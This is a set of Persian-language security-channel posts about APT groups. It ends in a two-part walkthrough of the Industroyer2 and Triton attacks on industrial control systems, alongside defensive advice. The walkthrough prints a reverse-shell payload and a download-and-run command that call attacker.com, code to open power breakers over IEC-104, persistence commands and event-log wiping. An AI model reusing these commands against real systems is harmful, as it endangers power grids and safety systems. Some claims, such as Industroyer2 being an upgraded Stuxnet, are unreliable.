#powershell
#APT

@TryHackBox

یک نفر از من #سوال کرد که :
چه کسی به گروه های APT شماره میدهد به طور مثال میگویند APT34 و .. ؟

#جواب :
گروه های APT معمولاً توسط شرکت های امنیتی یا سازمان های تحقیقاتی شماره می گیرند. به عنوان مثال، شرکت تشخیص تهدید APT FireEye و سازمان امنیت رایانه ای MITER Corporation هر دو برچسب های عددی را به گروه های هکر و تهدیدات بدافزار اختصاص می دهند.

#APT
@TryHackBox

📝 گزارش هکر وان

• من اغلب گزارش ها و مطالعات مختلفی را به اشتراک خواهم گذاشت که مطالعه آنها به ما کمک می کند تا اطلاعات منحصر به فرد و مفید زیادی در زمینه امنیت اطلاعات بدست آوریم. از این گذشته، خواندن کتاب به تنهایی یا گذراندن دوره‌ها شما را به یک متخصص باحال در زمینه خاصی تبدیل نمی‌کند، برای این کار باید تجربه عملی به دست آورید، دائماً یاد بگیرید و دانش را از منابع مرتبط به دست آورید.

• امروز یکی از آن منابع را به اشتراک خواهم گذاشت: مخزن گزارش های برتر HackerOne. این مخزن به طور مداوم به روز نگه داشته می شود که به شما کمک می کند چیزهای جدید و مفید زیادی را بیاموزید (گزینه های بهره برداری از آسیب پذیری های مختلف، بردارهای حمله و غیره).

• https://github.com/reddelexc/hackerone-reports

• علاوه بر این: یک مخزن مفید حاوی تجزیه و تحلیل کمپین های #فیشینگ باندهای #APT، حاوی نمونه ای از نامه ها و شرح ابزارهای مورد استفاده برای ارسال: https://github.com/wddadk/Phishing-campaigns
#HackerOne #Report
@TryHackBox
@TryHackBoxOfficial

APT
و حملات مالی به سازمان های صنعتی در نیمه دوم سال 2023.

• بررسی گزارشات مربوط به APT و حملات مالی به شرکت های صنعتی و فعالیت گروه های مشاهده شده در حملات به سازمان های صنعتی و تاسیسات زیرساختی حیاتی:

- فعالیت گروه های کره ای زبان؛
- فعالیت های مرتبط با خاورمیانه؛
- فعالیت گروه های چینی زبان.
- فعالیت گروه های روسی زبان؛
- دیگر؛
- هشدارهای CISA

#APT
@TryHackBox

عامل تهدید مورد حمایت ایران که تحت عنوان APT42 دنبال می شود، از حملات مهندسی اجتماعی، از جمله خودنمایی به عنوان روزنامه نگار، برای نفوذ به شبکه های شرکتی و محیط های ابری اهداف غربی و خاورمیانه استفاده می کند.

https://www.bleepingcomputer.com/news/security/iranian-hackers-pose-as-journalists-to-push-backdoor-malware/
#APT
@TRYHACKBOX

🔖 بازگشت سایه‌ی استاکس‌نت – قسمت اول
حمله واقعی به زیرساخت برق اوکراین با Industroyer2

💠 حمله پیشرفته‌ای از نوع ICS Targeted Malware توسط گروه APT روسی (Sandworm) تو سال ۲۰۲۲، گروه هکری وابسته به اطلاعات نظامی روسیه (GRU) با نام Sandworm حمله‌ای بزرگ و واقعی به زیرساخت برق اوکراین انجام داد. این حمله نسخه‌ای ارتقایافته از بدافزار معروف استاکس‌نت بود که بهش لقب دادن:

Industroyer2

این حمله به‌قصد خاموشی گسترده و بی‌ثباتی در مناطق حساس در اوکراین طراحی شده بود، دقیقاً همزمان با حمله‌ی نظامی روسیه.
حالا تو این دو قسمت، این حمله رو در ۵ فاز عملیاتی بررسی می‌کنیم.

📌 فاز اول: شناسایی و جمع‌آوری اطلاعات از شبکه برق (ICS Recon)
هکرها قبل از حمله، با استفاده از ابزارها و تکنیک‌های OSINT و دسترسی اولیه به شبکه، ساختار سیستم برق و نوع تجهیزات ICS رو شناسایی کردن.

🛠 ابزارهای مورد استفاده:
< — Shodan — >
پیدا کردن PLCها و HMIهای متصل به اینترنت

< — Wireshark — >
برای بررسی پروتکل‌های صنعتی مثل IEC-104، Modbus, DNP3

< — Nmap — >
با اسکریپت‌های مخصوص ICS

< — FOCA — >
برای جمع‌آوری متادیتای فایل‌های منتشرشده توسط شرکت برق

< — Active Directory Enum — >
برای کشف سیستم‌های مهندسی در شبکه داخلی

اسکن نمونه با Nmap:

nmap -sS -p 2404 --script=modbus-discover 10.10.0.0/16 

استخراج اطلاعات PLC از ترافیک IEC-104 با Wireshark:
iec104.asdu.typeid == 45 || iec104.asdu.typeid == 46


📌 فاز دوم: ورود به شبکه و اجرای اولیه بدافزار
گزارش CERT-UA نشون می‌ده که Sandworm از حساب RDP یکی از مهندسین شبکه وارد سیستم شده و از طریق یک فایل آلوده بدافزار رو مستقر کرده.

🔶 روش‌های ورود
سرقت رمز عبور از طریق فیشینگ یا Keylogger
استفاده از RDP Credentialهای لو رفته
اجرای فایل EXE مخرب با دسترسی SYSTEM

نمونه بدافزار ساخته‌شده با msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=attacker.com LPORT=443 -f exe > industroyer2.exe

ایجاد Persistence:

schtasks /create /tn "SCADA Sync" /tr "C:\ProgramData\industroyer2.exe" /sc onlogon /ru SYSTEM 

📌 فاز سوم: ارتباط مستقیم با PLC و تخریب زیرساخت
بدافزار Industroyer2 به‌صورت مستقیم به PLCهای شبکه برق وصل می‌شه و با استفاده از پروتکل IEC-104 دستور باز یا بسته‌کردن بریکرها (Breaker) رو صادر می‌کنه.

🔶 ساختار عملکرد بدافزار:
- اتصال TCP به پورت 2404 (IEC-104)
- ارسال دستور Single Command برای باز کردن بریکر
- ارسال دستور Double Command برای شبیه‌سازی فرمان مهندسی قانونی

نمونه کد Python برای باز کردن Breaker:

from iec104 import IEC104Client client = IEC104Client("10.0.0.12", 2404) client.connect() 
Cause = Spontaneous client.send_command(asdu_type=45, ioa=101, value=0) # breaker open client.disconnect() 

فایل کانفیگ شبکه در بدافزار:
{ "targets": [ {"ip": "10.0.0.12", "type": "siemens", "breaker_id": 101}, {"ip": "10.0.0.15", "type": "schneider", "breaker_id": 110} ], "payload_type": "iec104", "command": "breaker_open" }


📌 فاز چهارم: پاکسازی ردپا و لاگ‌ها
بعد از اجرا، بدافزار تلاش می‌کنه ردپاهای خودش رو پاک کنه

دستورات استفاده‌شده:

wevtutil cl System wevtutil cl Application Remove-Item -Path "$env:APPDATA\Microsoft\Windows\Recent\*" -Force 

📌 فاز پنجم: شناسایی حمله و مقابله توسط CERT-UA
مرکز پاسخ اضطراری اوکراین تونست حمله رو در لحظه آخر شناسایی کنه.
تحلیل نمونه Industroyer2 نشون داد که فقط روی سیستم‌های خاص با تجهیزات SCADA فعال می‌شه.
با بررسی لاگ‌های شبکه و دسترسی مشکوک از RDP کشف و فایل EXE با نام جعلی update_driver.exe روی سیستم مهندسین دیده شد.

🔶 روش‌های دفاعی پیشنهادی
- استفاده از ابزارهای تخصصی ICS مانند Nozomi و Dragos
- ایزوله‌کردن کامل سیستم‌های SCADA و PLC از شبکه IT
- بررسی ترافیک پورت 2404 با Suricata/Zeek برای دستورات مشکوک
- تحلیل Signatureهای پروتکل IEC-104

📌 این حمله ادامه‌ی استاکس‌نت بود؛ با دقت بیشتر، طراحی خاص برای اوکراین و قابلیت اجرای فرمان مستقیم روی شبکه برق. این حمله نشون داد که تو دنیای جنگ‌های مدرن، کلید برق یه کشور می‌تونه با یه packet خاموش بشه.

✍️نویسنده
@TryHackBox| Condor

#ICS #SCADA #CyberWarfare #APT #Industroyer #InfoSec

🔖بازگشت سایه‌ی استاکس‌نت – قسمت دوم
بدافزاری که سیستم‌های ایمنی صنعتی (SIS) رو هدف گرفت

💠 حمله واقعی به تأسیسات پتروشیمی و نیروگاه‌ها با هدف ایجاد فاجعه انسانی


📌 فاز اول: شناخت سیستم‌های SIS و آسیب‌پذیری‌ها
سیستم‌های SIS (Safety Instrumented Systems) وظیفه قطع خودکار و فوری عملیات خطرناک در کارخانه‌ها و نیروگاه‌ها رو دارند تا از وقوع انفجار یا نشت مواد سمی جلوگیری کنند. Triton طوری طراحی شده که این سیستم‌ها رو خاموش کنه یا کنترل‌شون رو بدست بگیره.

💻 سیستم‌های هدف:
Triconex SIS ساخت Schneider Electric
PLCهای خاص با دسترسی شبکه به پورت 18245


📌 فاز دوم: نفوذ به شبکه ICS و نصب بدافزار
گزارش FireEye نشون داده که مهاجم‌ها ابتدا به شبکه IT نفوذ کردند و از اونجا به شبکه کنترل صنعتی نفوذ کردند. بعد با استفاده از دسترسی‌های RDP یا VPN غیرمجاز، بدافزار Triton رو روی سرور مهندسی نصب کردند.

نمونه دستورات نصب بدافزار:

Invoke-WebRequest -Uri http://attacker.com/triton.exe -OutFile C:\Windows\Temp\triton.exe Start-Process -FilePath C:\Windows\Temp\triton.exe 

📌 فاز سوم: ارتباط مستقیم با PLCهای Triconex و تغییر عملکرد
بدافزار با استفاده از پروتکل اختصاصی Triconex، با PLCهای SIS ارتباط برقرار می‌کنه و کدهای امنیتی رو تغییر می‌ده یا کاملاً سیستم رو از کار می‌اندازه.

نمونه کد بازسازی‌شده (Pseudo Python):

import socket def send_triton_cmd(ip, port, payload): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) s.send(payload) response = s.recv(1024) s.close() return response
payload = b'\x01\x03\x00\x00\x00\x06\xC5\xCD'
response = send_triton_cmd("10.10.10.5", 18245, payload) print("Response:", response)

📌فاز چهارم: ایجاد خاموشی و نابودی عملکرد ایمنی
با اجرای فرمان‌های بدافزار، سیستم‌های ایمنی به حالت Fail-safe نمی‌رن بلکه خاموش می‌شن، این یعنی حتی اگر خطری وجود داشته باشه، سیستم به وظیفه‌اش عمل نمی‌کنه و باعث حادثه بزرگ می‌شه.
فاز پنجم: پاک‌سازی ردپا و استتار
توطئه‌گران ردپای خود را با حذف لاگ‌ها و بازنویسی تاریخچه فرمان‌ها پاک کردند.

دستورات پاک‌سازی:

wevtutil cl Security wevtutil cl System Clear-EventLog -LogName "Application"

🔶 روش‌های مقابله و پیشگیری
- پیاده‌سازی فیلترهای دقیق در فایروال‌های صنعتی
- نظارت بر ترافیک پورت 18245 و تشخیص رفتارهای غیرمعمول
- آموزش کارکنان به ویژه مهندسین شبکه برای جلوگیری از فیشینگ
- استفاده از سیستم‌های IDS/IPS تخصصی برای ICS
- ایزوله‌سازی شبکه کنترل صنعتی از شبکه عمومی و اینترنت


📌 بدافزار Triton یک هشدار جدی به صنایع حساس و زیرساخت‌های حیاتی جهان است که حمله‌های سایبری می‌توانند به قیمت جان انسان‌ها تمام شوند. کنترل سیستم‌های ایمنی صنعتی دیگر یک گزینه نیست، یک ضرورت حیاتی است.

✍️نویسنده
@TryHackBox| Condor

#ICS #SCADA #CyberWarfare #APT #Triton #InfoSec